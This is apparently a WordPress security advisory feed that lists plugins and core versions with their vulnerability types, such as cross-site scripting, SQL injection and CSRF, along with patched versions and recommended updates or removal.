Plugin: Admin Word Count Column

Vulnerability: Arbitrary File Read
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Woocommerce Tranzila Payment Gateway

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Platinum SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Plausible Analytics

Vulnerability: Reflected Cross-Site Scripting via page-url
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Titan Anti-spam & Security

Vulnerability: IP Spoofing to Protection Bypass
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: GNU-Mailman Integration

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Reflected Cross-Site Scripting via ‘page’ and ‘tab’
Patched Version: 12.1.21
Recommended Action: Update to version 12.1.21, or a newer patched version

Plugin: Turn off all comments

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: stats

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Fast Custom Social Share by CodeBard

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 4.1.5
Recommended Action: Update to version 4.1.5, or a newer patched version

Plugin: Simple Staff List

Vulnerability: Missing Authorization via ajax_flush_rewrite_rules and staff_member_export
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Affiliate Ads for cbAds.com

Vulnerability: Cross-Site Scripting
Patched Version: 1.35
Recommended Action: Update to version 1.35, or a newer patched version

Plugin: Travel Map

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Simple Fields

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WHMCS Bridge

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 6.4b
Recommended Action: Update to version 6.4b, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Reflected Cross-Site Scripting via linkbutton
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.20.24
Recommended Action: Update to version 1.20.24, or a newer patched version

Plugin: Campaign Monitor Forms by Optin Cat

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Options Update via ajax_dismiss_notice
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Dropdown Menu Widget

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DJ EmailPublish

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JoomSport – for Sports: Team & League, Football, Hockey & more

Vulnerability: Unauthenticated SQL Injection
Patched Version: 5.2.8
Recommended Action: Update to version 5.2.8, or a newer patched version

Plugin: WP Stripe Checkout

Vulnerability: Sensitive Information Exposure via Debug Log
Patched Version: 1.2.2.38
Recommended Action: Update to version 1.2.2.38, or a newer patched version

Plugin: IFrame Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: JetEngine

Vulnerability: Missing Authorization
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: Smart Post Show – Post Grid, Post Carousel, Post Slider, Post Timeline, Post Table, and List Category Posts, Latest Posts, Recent Posts, Popular Posts and More

Vulnerability: Missing Capabilities Check
Patched Version: 2.3.5
Recommended Action: Update to version 2.3.5, or a newer patched version

Plugin: Glass

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Stored Cross-Site Scripting
Patched Version: 7.0.0
Recommended Action: Update to version 7.0.0, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.0
Recommended Action: Update to one of the following versions, or a newer patched version: 3.0, 3.0.5

Plugin: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.2.53
Recommended Action: Update to version 1.2.53, or a newer patched version

Plugin: Breadcrumb NavXT

Vulnerability: Sensitive Data Exposure
Patched Version: 6.2.0
Recommended Action: Update to version 6.2.0, or a newer patched version

Plugin: WP Shop

Vulnerability: SQL Injection
Patched Version: 3.4.3.16
Recommended Action: Update to version 3.4.3.16, or a newer patched version

Plugin: WebP Express

Vulnerability: Arbitrary File Read
Patched Version: 0.14.11
Recommended Action: Update to version 0.14.11, or a newer patched version

Plugin: CM Tooltip Glossary

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.9.21
Recommended Action: Update to version 3.9.21, or a newer patched version

Plugin: custom-metas

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Order XML File Export Import for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Add Social Share Buttons for Whatsapp and Viber

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Salat Times

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.2
Recommended Action: Update to version 3.2.2, or a newer patched version

Plugin: yahoo-updates-for-wordpress

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Clean Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.10.4
Recommended Action: Update to version 1.10.4, or a newer patched version

Plugin: GoCodes

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Community Events

Vulnerability: SQL Injection
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WordPress Pinterest Plugin – Make a Popup, User Profile, Masonry and Gallery Layout

Vulnerability: Missing Authorization via _update_shortcode
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Reflected Cross-Site Scripting in ajax_stockticker_symbol_search_test
Patched Version: 3.23.3
Recommended Action: Update to version 3.23.3, or a newer patched version

Plugin: Pixel Cat – Conversion Pixel Manager

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.6.3
Recommended Action: Update to version 2.6.3, or a newer patched version

Plugin: AI Power: Complete AI Pack

Vulnerability: Missing Authorization to Sensitive Data Exposure
Patched Version: 1.8.3
Recommended Action: Update to version 1.8.3, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Multiple SQL Injection
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: FunCaptcha – Anti-Spam CAPTCHA

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.3.3
Recommended Action: Update to version 0.3.3, or a newer patched version

Plugin: Login/Signup Popup ( Inline Form + Woocommerce )

Vulnerability: Cross-Site Request Forgery to Settings Reset
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: We’re Open!

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.42
Recommended Action: Update to version 1.42, or a newer patched version

Plugin: WPPerformanceTester

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Register Plus Redux

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimeter

Vulnerability: Missing Authorization to Arbitrary Options Update
Patched Version: 1.9.3
Recommended Action: Update to version 1.9.3, or a newer patched version

Plugin: Advanced Text Widget

Vulnerability: Missing Authorization via atw_dismiss_admin_notice
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Sidebar Widgets by CodeLights

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Loan Comparison

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting via Shortcode
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: WP Testimonials

Vulnerability: Cross-Site Request Forgery to Widget Deletion
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Sitemap Index

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads (EDD) Stripe

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: WC Captcha

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EELV Newsletter

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via Several Parameters
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: BuddyPress

Vulnerability: Missing Authorization to Private Post Activity
Patched Version: 7.3.0
Recommended Action: Update to version 7.3.0, or a newer patched version

Plugin: Database Cleaner

Vulnerability: Sensitive Information Exposure via Log File
Patched Version: 0.9.9
Recommended Action: Update to version 0.9.9, or a newer patched version

Plugin: Easy Cookie Law

Vulnerability: Cross-Site Request Forgery via ‘ecl_options’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Hotel Listings

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Post Hit Counter

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP All Import Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via Media Metadata
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Intelligent WordPress Live Chat Support Plugin | Utilities

Vulnerability: Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Database Backup for WordPress

Vulnerability: Admin+ SQL Injection
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.92
Recommended Action: Update to version 1.9.92, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Post Content
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.6
Recommended Action: Update to version 3.4.6, or a newer patched version

Plugin: WordPress Simple Shopping Cart

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.6
Recommended Action: Update to version 3.6, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Sensitive Information Disclosure via Shortcode
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: WP Show Posts

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: SQL Injection
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection via cg_copy_start
Patched Version: 19.1.5
Recommended Action: Update to version 19.1.5, or a newer patched version

Plugin: Menu Image, Icons made easy

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Open Proxy
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Nested Pages

Vulnerability: Open Redirect
Patched Version: 3.1.16
Recommended Action: Update to version 3.1.16, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: 4.5.3.1
Recommended Action: Update to version 4.5.3.1, or a newer patched version

Plugin: Pixabay Images

Vulnerability: Authentication Bypass to Arbitrary File Upload
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: CC Child Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.43
Recommended Action: Update to version 1.43, or a newer patched version

Plugin: 2 Click Social Media Buttons

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 0.34
Recommended Action: Update to version 0.34, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Product Manipulation
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Discount Rules for WooCommerce – Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: VK All in One Expansion Unit

Vulnerability: Stored (Contributor+) Cross-Site Scripting in Profile Setting
Patched Version: 9.88.2.0
Recommended Action: Update to version 9.88.2.0, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Authenticated (Admin+) Local File Inclusion
Patched Version: 1.16.59
Recommended Action: Update to version 1.16.59, or a newer patched version

Plugin: Easy Photo Album

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.1.6
Recommended Action: Update to version 1.1.6, or a newer patched version

Plugin: Ultimate GDPR & CCPA Compliance Toolkit for WordPress

Vulnerability: Unauthenticated Settings Import & Export
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Limit Login Attempts

Vulnerability: Administrator+ Cross-Site Scripting
Patched Version: 4.0.72
Recommended Action: Update to version 4.0.72, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.8.5
Recommended Action: Update to version 0.8.5, or a newer patched version

Plugin: Add Comments

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_save_folder_order
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version

Plugin: Loginizer

Vulnerability: Reflected Cross-Site Scripting via ‘name’
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Simple Download Monitor

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 3.5.4
Recommended Action: Update to version 3.5.4, or a newer patched version

Plugin: Hot Linked Image Cacher

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WooCommerce Advanced Bulk Edit Products, Orders, Coupons, Any WordPress Post Type – Smart Manager

Vulnerability: Unauthenticated SQL Injection
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Webmaster Tools

Vulnerability: Cross-Site Request Forgery via lionscripts_plg_f
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: yolink Search for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.6
Recommended Action: Update to version 2.6, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Authenticated SQL Injection
Patched Version: 4.1.4
Recommended Action: Update to version 4.1.4, or a newer patched version

Plugin: Sell Media

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.2
Recommended Action: Update to version 2.4.2, or a newer patched version

Plugin: Advanced uploader

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP ULike – All-in-One Engagement Toolkit

Vulnerability: Cross-Site Scripting
Patched Version: 3.2
Recommended Action: Update to version 3.2, or a newer patched version

Plugin: Shoppable Images

Vulnerability: Missing Authorization
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3.23
Recommended Action: Update to version 1.2.3.23, or a newer patched version

Plugin: Fudousan Plugin

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Job Board

Vulnerability: Reflected Cross-Site Scripting & Cross-Frame Scripting
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: CLUEVO LMS, E-Learning Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.11.0
Recommended Action: Update to version 1.11.0, or a newer patched version

Plugin: Sort SearchResult By Title

Vulnerability: Cross-Site Request Forgery via settings_page
Patched Version: 11.0
Recommended Action: Update to version 11.0, or a newer patched version

Plugin: Portfolio by BestWebSoft – Work and Projects Presentation Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Social Media Feather | social media sharing

Vulnerability: Missing Authorization
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Frontend Post WordPress Plugin – AccessPress Anonymous Post

Vulnerability: Backdoored
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Random Banner

Vulnerability: Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: kbslider

Vulnerability: Path Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SureCart – Ecommerce Made Easy For Selling Physical Products, Digital Downloads, Subscriptions, Donations, & Payments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Cross-Site Request Forgery via views/tools/diagnostics/information.php
Patched Version: 1.5.7.1
Recommended Action: Update to version 1.5.7.1, or a newer patched version

Plugin: Login With Ajax – Fast Logins, 2FA, Redirects

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.4.1
Recommended Action: Update to version 3.0.4.1, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (Administrator+) Directory Traversal to Arbitrary File Read
Patched Version: 5.6.24
Recommended Action: Update to version 5.6.24, or a newer patched version

Plugin: Advanced Shipment Tracking for WooCommerce

Vulnerability: Authenticated WordPress Options Change
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: MasterStudy LMS WordPress Plugin – for Online Courses and Education

Vulnerability: Missing Authorization to Course Category Creation
Patched Version: 3.0.9
Recommended Action: Update to version 3.0.9, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Image URL
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: AMP+ Plus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Directory Listings WordPress plugin – uListing

Vulnerability: Unauthenticated Arbitrary Account Changes
Patched Version: 1.7
Recommended Action: Update to version 1.7, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Cross-Site Scripting via post_title parameter
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Directorist: AI-Powered WordPress Business Directory Plugin with Classified Ads Listings

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: 7.0.6.2
Recommended Action: Update to version 7.0.6.2, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Missing Authorization to Transients Deletion
Patched Version: 7.33
Recommended Action: Update to version 7.33, or a newer patched version

Plugin: NextScripts: Social Networks Auto-Poster

Vulnerability: Arbitrary Post Deletion via Cross-Site Request Forgery
Patched Version: 4.3.25
Recommended Action: Update to version 4.3.25, or a newer patched version

Plugin: ENL Newsletter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated Access or Cross-Site Request Forgery leading to SQL Injection via orderby, order Parameters
Patched Version: 3.8.3
Recommended Action: Update to version 3.8.3, or a newer patched version

Plugin: Maps by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: HTML5 AV Manager

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Amazonify

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 1.9.13
Recommended Action: Update to version 1.9.13, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.49
Recommended Action: Update to version 3.2.49, or a newer patched version

Plugin: WooPayments: Integrated WooCommerce Payments

Vulnerability: 5.6.1 Authentication Bypass and Privilege Escalation
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Simple URLs – Link Cloaking, Product Displays, and Affiliate Link Management

Vulnerability: Cross-Site Request Forgery via Multiple AJAX Actions
Patched Version: 121
Recommended Action: Update to version 121, or a newer patched version

Plugin: Social Share Boost

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: HTML5 MP3 Player with Playlist Free

Vulnerability: Full Path Disclosure
Patched Version: 2.8.0
Recommended Action: Update to version 2.8.0, or a newer patched version

Plugin: JobBoardWP – Job Board Listings and Submissions

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Mingle Forum

Vulnerability: SQL Injection
Patched Version: 1.0.33
Recommended Action: Update to version 1.0.33, or a newer patched version

Plugin: Dynamic Word Spinner: CSS3 Animated Rotation

Vulnerability: Missing Authorization via save_admin_options
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Arbitrary File Upload
Patched Version: 2.0.77.3
Recommended Action: Update to version 2.0.77.3, or a newer patched version

Plugin: MapPress Maps for WordPress

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.88.15
Recommended Action: Update to version 2.88.15, or a newer patched version

Plugin: Category Specific RSS feed Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: WordPress Button Plugin MaxButtons

Vulnerability: Shortcode-Based Cross-Site Scripting
Patched Version: 9.3
Recommended Action: Update to version 9.3, or a newer patched version

Plugin: PHP Compatibility Checker

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Gallery – Photo Albums Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.3.50
Recommended Action: Update to version 1.3.50, or a newer patched version

Plugin: Import any XML, CSV or Excel File to WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload via Path Traversal
Patched Version: 3.6.9
Recommended Action: Update to version 3.6.9, or a newer patched version

Plugin: CBX Bookmark & Favorite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.9
